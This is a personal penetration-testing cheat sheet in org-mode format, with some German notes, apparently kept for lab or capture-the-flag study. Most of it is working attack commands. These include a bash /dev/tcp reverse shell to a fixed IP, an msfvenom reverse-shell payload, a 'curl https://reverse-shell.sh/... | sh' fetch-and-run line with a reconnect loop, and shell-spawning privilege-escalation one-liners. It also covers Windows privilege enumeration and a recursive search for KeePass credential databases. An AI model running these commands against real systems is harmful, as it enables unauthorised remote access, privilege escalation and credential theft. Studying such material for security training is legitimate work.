# Table of Contents

1.  [information gathering](#org852ec36)
        1.  [nmap](#orgda1065c)
        2.  [dirb](#orgafbfb19)
2.  [inital access](#orgd5250d9)
        1.  [start listener:](#orgefad80b)
        2.  [reverse shell bash:](#org147daab)
        3.  [reverse shell file:](#org32886e3)
        4.  [untested:](#org6c097fc)
3.  [privilege escalation](#org6812526)
    1.  [always run these:](#org0b25bb0)
    2.  [TTY Spawn Shell](#org4152682)
        1.  [Python spawn shell](#orgf659bfd)
        2.  [OS system spawn shell](#org76c29ea)
        3.  [Bash spawn shell](#org80d5744)
        4.  [Perl spawn shell](#orgd4f31f3)
        5.  [Ruby spawn shell](#org2fe4e07)
        6.  [Lua spawn shell](#orgce64187)
        7.  [IRB spawn shell](#org28402e0)
        8.  [VI spawn shell](#org6bfa44c)
        9.  [VI(2) spawn shell](#org4241f95)
        10. [Nmap spawn shell](#org5dc86b6)
4.  [Windows](#orgdcc9f31)
        1.  [WinPEAS](#org21afc9d)
        2.  [LOLBAS](#org08b790e)
        3.  [WADCOMS](#orgb12dcff)
        4.  [PrivescCheck Script as an alternative to WinPEAS](#org2bed5cd)
        5.  [RUN these while the other scripts are working](#orgea4f773)
        6.  [for finding kbdx Files](#org0f35200)

1.  to install:

    -   magic wormhole
    -   tldr
    -   rlwrap
    -   
    
        sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap

2.  for keyring

    -> if there is some kind of keyring error
    
        sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg


<a id="org852ec36"></a>

# information gathering


<a id="orgda1065c"></a>

### nmap

for quick scan of available ips 

    nmap -sn ip/24

to filter output for open ips 

    nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt

scan open ports:

    nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 


<a id="orgafbfb19"></a>

### dirb

    dirb http://ip

1.  bei windows

        nmap --vuln ip  
    
    1.  bei windows \\+ smb
    
            nmap --script smb-vuln* ip  


<a id="orgd5250d9"></a>

# inital access


<a id="orgefad80b"></a>

### start listener:

    rlwrap -cAr nc -nlvp 9002


<a id="org147daab"></a>

### reverse shell bash:

    /bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1


<a id="org32886e3"></a>

### reverse shell file:

    msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py

-> from revshells.com


<a id="org6c097fc"></a>

### untested:

Reverse Shell as a Service

1.  On your machine:

    nc -l 1337
    or nlvp?

1.  On the target machine:

    curl https://reverse-shell.sh/yourip:1337 | sh

1.  reconnecting:

        while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done


<a id="org6812526"></a>

# privilege escalation


<a id="org0b25bb0"></a>

## always run these:

    sudo -l

if sudo doesn&rsquo;t work: 
[3.2](#org4152682)

1.  check cronjobs

        ls /etc/cron.*
        crontab -l


<a id="org4152682"></a>

## TTY Spawn Shell

1.  if sudo still doesn&rsquo;t work

    use
    
        sudo -S command
    
    Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.


<a id="orgf659bfd"></a>

### Python spawn shell

    python -c 'import pty; pty.spawn("/bin/bash")'

Fully Interactive TTY

1.  All the steps to stabilize your shell

    ****The first step:****
    
        python3 -c 'import pty;pty.spawn("/bin/bash")'
    
    Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys.
    
    ****Step two is:****
    
        export TERM=xterm
    
    This will give us access to term commands such as clear.
    
    ****Finally (and most importantly) we will background the shell using****
    
        Ctrl + Z
    
    Back in our own terminal we use
    
        stty raw -echo; fg
    
    This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes
    
        stty rows 38 columns 116


<a id="org76c29ea"></a>

### OS system spawn shell

    echo os.system("/bin/bash")


<a id="org80d5744"></a>

### Bash spawn shell

    /bin/sh -i


<a id="orgd4f31f3"></a>

### Perl spawn shell

    perl —e 'exec "/bin/sh";'


<a id="org2fe4e07"></a>

### Ruby spawn shell

ruby: exec &ldquo;/bin/sh&rdquo;


<a id="orgce64187"></a>

### Lua spawn shell

lua: os.execute(&ldquo;/bin/sh&rdquo;)


<a id="org28402e0"></a>

### IRB spawn shell

exec &ldquo;/bin/sh&rdquo;


<a id="org6bfa44c"></a>

### VI spawn shell

    :!bash


<a id="org4241f95"></a>

### VI(2) spawn shell

    :set shell=/bin/bash:shell


<a id="org5dc86b6"></a>

### Nmap spawn shell

    !sh

1.  Exiftools

    Metadaten auslesen:
    
        exiftool picture.png  
    
    Binwalk (Binary Daten exportieren):
    
        binwalk -e picture.png  


<a id="orgdcc9f31"></a>

# Windows


<a id="org21afc9d"></a>

### WinPEAS

<https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS>


<a id="org08b790e"></a>

### LOLBAS

<https://lolbas-project.github.io/>#


<a id="orgb12dcff"></a>

### WADCOMS

<https://wadcoms.github.io/>


<a id="org2bed5cd"></a>

### PrivescCheck Script as an alternative to WinPEAS

<https://github.com/itm4n/PrivescCheck>


<a id="orgea4f773"></a>

### RUN these while the other scripts are working

    whoami /priv
    
    whoami /all
    
    schtasks /query


<a id="org0f35200"></a>

### for finding kbdx Files

<https://github.com/ivanmrsulja/keepass2john>

    Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue

quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;

evilwinrm
quick Wins Linux:
gdb -nx -ex &rsquo;!sh&rsquo; -ex quit
sudo mysql -e &rsquo;! /bin/sh&rsquo;
strace -o /dev/null /bin/sh
sudo awk &rsquo;BEGIN {system(&ldquo;/bin/sh&rdquo;)}&rsquo;

https://nextcloud.th-deg.de/s/ex5yzQ6NtGeKp32
https://github.com/Obedaya/scripts
https://mygit.th-deg.de/lg06087/pentesting